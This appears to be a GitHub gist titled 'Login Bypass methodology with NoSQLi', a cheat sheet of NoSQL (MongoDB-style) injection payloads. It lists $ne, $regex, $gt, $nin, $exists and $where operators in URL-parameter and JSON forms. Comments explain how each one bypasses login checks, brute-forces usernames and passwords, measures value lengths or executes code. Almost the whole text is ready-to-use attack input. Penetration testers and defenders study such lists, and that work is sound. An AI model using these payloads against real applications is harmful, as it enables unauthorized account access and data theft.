@rootsploit
Last active February 10, 2024 06:41
Login Bypass methodology with NoSQLi
Bypass with Operator:
username[$ne]=1&password[$ne]=1 # <Not Equals>
username[$regex]=^adm&password[$ne]=1 # Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 # Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 # <Equals>
username[$ne]=admin&pass[$lt]=s # <Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s # <Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 # <Matches none of the values in the array> (not test and not admin)
{ $where: "this.credits == this.debits" } # <IF>, can be used to execute code
Bypass with Not Equal Operator
#in URL
username[$ne]=toto&password[$ne]=toto
username[$exists]=true&password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }